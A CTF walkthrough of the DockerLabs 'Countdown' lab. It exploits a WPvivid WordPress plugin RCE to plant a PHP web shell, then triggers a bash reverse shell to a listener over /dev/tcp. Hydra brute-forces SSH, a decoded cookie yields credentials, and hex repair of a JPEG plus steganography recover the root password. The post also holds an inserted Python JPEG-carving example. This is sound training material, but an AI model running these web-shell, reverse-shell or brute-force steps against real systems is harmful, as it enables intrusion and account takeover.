June 13, 2026
DockerLabs CTF: Countdown Walkthrough — WPvivid RCE & Advanced Hex File Reconstruction
SWALE
The transition from structured Capture The Flag (CTF) environments to the unpredictable landscape of live bug bounty hunting — on platforms like HackerOne and YesWeHack — requires a fundamental shift in mindset. You stop looking for deliberate breadcrumbs and start hunting for real-world misconfigurations. However, high-quality labs remain an invaluable proving ground for keeping manual reconnaissance and vulnerability triage skills razor-sharp.
Today, we are tearing down the Countdown machine from DockerLabs. This box stands out because it perfectly mimics a multi-stage attack path. We'll start with the classic exploitation of a vulnerable WordPress plugin (CVE-2026-1357) for initial access, pivot through credential enumeration, and conclude with a heavily manual digital forensics challenge that requires surgical hexadecimal file repair and steganography.
Let's get into the weeds.
Phase 1: Reconnaissance & Enumeration
We kick things off by mapping the target's attack surface using Nmap to discover open ports and running services.
sudo nmap -p- -sS -sV 172.17.0.2
The scan reveals two open ports:
- Port 22 (SSH): Running OpenSSH 9.6p1.
- Port 80 (HTTP): Running Apache 2.4.58.
Knowing a web server is in play, the next logical step is to enumerate the application layer. Identifying a WordPress installation in the /secret_portal_65hBlEo9OU directory, we utilize WPScan (or similar plugin detection) to aggressively enumerate vulnerable components.
The scan successfully identifies the wpvivid-backuprestore plugin running version 0.9.123. A quick search confirms that versions <= 0.9.123 are vulnerable to an authenticated Remote Code Execution (CVE-2026-1357).
Phase 2: Exploitation & Initial Foothold
To weaponize CVE-2026-1357, we need to prepare our attack environment. The exploit leverages a cryptographic fail-open condition (using a null AES key/IV) and requires the phpseclib library to successfully generate the payload.
wget -q https://raw.githubusercontent.com/phpseclib/phpseclib/1.0.20/phpseclib/Crypt/Base.php -O phpseclib/Crypt/Base.php
With the library in place, we execute the Python Proof of Concept (PoC) script (which I found on GitHub for this particular CVE) against the target portal.
python3 exploit.py -u http://172.17.0.2/secret_portal_65hBlEo9OU -s ls
The exploit successfully uploads our malicious PHP web shell (qg3gmie4aiwnyh4hl4pvkwb3.php). The RCE is confirmed by the output of our ls verification command.
To upgrade this to a stable, interactive session, we set up a Netcat listener.
nc -nvlp 1188
We then trigger a bash reverse shell by passing the payload directly through the browser via the ?cmd= parameter:
http://172.17.0.2/secret_portal_65hBlEo9OU/wp-content/uploads/qg3gmie4aiwnyh4hl4pvkwb3.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.0.2.15/1188+0>%261'
Excellent. Now we've caught the shell as the www-data user.
Phase 3: Lateral Movement
While enumerating the internal file system as www-data, I dug through the web directories and discovered an HTTP request dump stored in a file named copy2321_.php.
cat copy2321_.php
The request contained a highly suspicious cookie: session_id=ZXRoYW46cGZMbWVzJFR0HcFJDbUFDVFAK. Recognizing the Base64 signature, I moved the string over to CyberChef. By stripping the non-alphabet characters and decoding it, we extracted a set of credentials: ethan:pfLmWVz2EGKGpRCmACTP.
Simultaneously, never one to ignore parallel attack vectors, I had Hydra running in the background to brute-force SSH for the user bond utilizing the standard rockyou.txt wordlist.
hydra -l bond -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -T 64
Hydra struck gold before we even needed Ethan's credentials, identifying the SSH password for bond as 999999999. We SSH into the machine and claim our user flag.
ls
cat user.txt
User Flag: DL{REDACTED}
Phase 4: Privilege Escalation & Hex Forensics
This is where the challenge moves away from standard web exploitation and tests our digital forensics capabilities. While exploring bond's home directory, we locate a suspicious image file named captura3.jpg. Running basic file enumeration tools immediately raises red flags.
file captura3.jpg
exiftool captura3.jpg
The file command simply returns data, and exiftool throws a critical warning: PNG image did not start with IHDR.
Let's dump the hex data to see exactly how this file has been corrupted.
xxd captura3.jpg | head
The file begins with a fake PNG header (.PNG...IF....X). However, checking the end of the file tells a different story.
xxd captura3.jpg | tail
We can clearly see the valid JPEG End of Image (EOI) marker ff d9. This indicates a valid JPEG is buried inside this corrupted wrapper. To isolate the image, we copy the file and search for the first JPEG quantization table (DQT) marker, ff db, which marks where the real JPEG segments begin.
cp captura3.jpg captura3.bin
xxd captura3.bin | grep -n "ff db"
We locate the ff db marker on line 6 of the xxd output. Using the dd command, we surgically skip the first 18 bytes to strip out the bogus PNG header.
dd if=captura3.bin of=swale.jpg bs=1 skip=18
After inspecting the output, an additional 2 bytes need to be skipped to clean the binary structure completely.
dd if=swale.jpg of=swale2.jpg bs=1 skip=2
With the garbage data completely removed, the file still requires a valid JPEG Start of Image (SOI) header (ff d8) to render properly. We can manually echo these hex bytes into a new file and append our cleaned binary data to it.
echo -n -e "\xff\xd8" > swale_image_final.jpg
cat swale2.jpg >> swale_image_final.jpg
file swale_image_final.jpg
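The xxd/dd/echo sequence above repairs one specific file by hand. As an added example that is not part of the original write-up, the Python below generalises those steps: it checks for the trailing EOI marker, locates the first DQT (ff db) segment, discards everything before it, restores the SOI marker, and then walks the JPEG marker chain to confirm the rebuilt file is structurally sound. The sample bytes are constructed for the demo, not the real captura3.jpg.

```python
"""Carve a JPEG out of a blob that had a bogus PNG header prepended and its
SOI marker removed, then validate the repaired marker chain."""

SOI, EOI, DQT = b"\xff\xd8", b"\xff\xd9", b"\xff\xdb"
SOS = 0xDA
RST = set(range(0xD0, 0xD8))          # restart markers, legal inside scan data
STANDALONE = {0x01, *RST}             # markers that carry no length field


def carve_jpeg(blob: bytes) -> bytes:
    """Strip the junk wrapper in front of the first DQT segment and restore SOI."""
    if not blob.endswith(EOI):
        raise ValueError("no JPEG End of Image (ff d9) marker at end of file")
    if blob.startswith(SOI):
        return blob                    # already a well-formed start, nothing to do
    start = blob.find(DQT)             # first real JPEG segment after the fake header
    if start < 0:
        raise ValueError("no DQT (ff db) marker found; not a stripped JPEG")
    return SOI + blob[start:]


def walk_segments(data: bytes) -> list:
    """Return the marker bytes in order; raise if the segment chain is broken."""
    if not data.startswith(SOI):
        raise ValueError("missing SOI")
    markers, pos = [0xD8], 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        marker = data[pos + 1]
        markers.append(marker)
        pos += 2
        if marker == 0xD9:
            return markers
        if marker in STANDALONE:
            continue
        pos += int.from_bytes(data[pos:pos + 2], "big")   # length includes itself
        if marker == SOS:
            # Skip entropy-coded data: it ends at ff followed by anything other
            # than a stuffed 00 or an RSTn marker.
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] != 0x00 and data[pos + 1] not in RST
            ):
                pos += 1
    raise ValueError("file ended before EOI marker")


# Constructed sample: 18-byte fake PNG header, 2 junk bytes, then a JPEG body
# whose SOI was cut off (DQT segment, tiny SOS segment with scan data, EOI).
FAKE_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x00IF" + b"\x00\x00\x00X"
DQT_SEG = DQT + b"\x00\x43\x00" + bytes(range(64))
SOS_SEG = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\xff\x00\x34"
SAMPLE = FAKE_HEADER + b"\x00\x00" + DQT_SEG + SOS_SEG + EOI
```

Running carve_jpeg over the real file and then walk_segments over the result gives the same confirmation the file command did, plus an early, specific error if the carve landed in the wrong place.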
Success! The file command now happily reports: JPEG image data. Opening the image reveals a picture of a bag packed with dynamite—a perfect nod to the "Countdown" theme.
Knowing this image is the focal point of our privilege escalation, we check it for hidden steganography data and successfully extract a hidden text file using stegseek.
stegseek swale_image_final.jpg /usr/share/wordlists/rockyou.txt
cat swale_image_final.jpg.out
The output reveals a cipher text: hGRjVqry0tcVYpgvVjzm.
Leveraging dCode's Cipher Identifier toolkit, the string decrypts directly to the root password. We switch users, enter our shiny new password, and grab the final flag.
su root
cd /root/
ls
cat root.txt
Finally, we have the root flag. Root Flag: DL{REDACTED}
Conclusion
The Countdown machine is a masterclass in why relying solely on automated tools will eventually leave you stuck. While standard enumeration tools like WPScan and Hydra paved the way for our initial foothold, the true test of this box was the privilege escalation. Identifying a corrupted file signature, manually carving out a bogus PNG header via hexadecimal manipulation, and repairing the underlying JPEG magic bytes are exactly the kind of deep-dive manual analysis skills that separate standard triage from advanced vulnerability research.
Whether you are actively grinding on bug bounty targets or just looking to elevate your digital forensics and reverse engineering workflows, Countdown is a phenomenal exercise in connecting the dots.
Keep hunting, and until the next writeup — stay curious.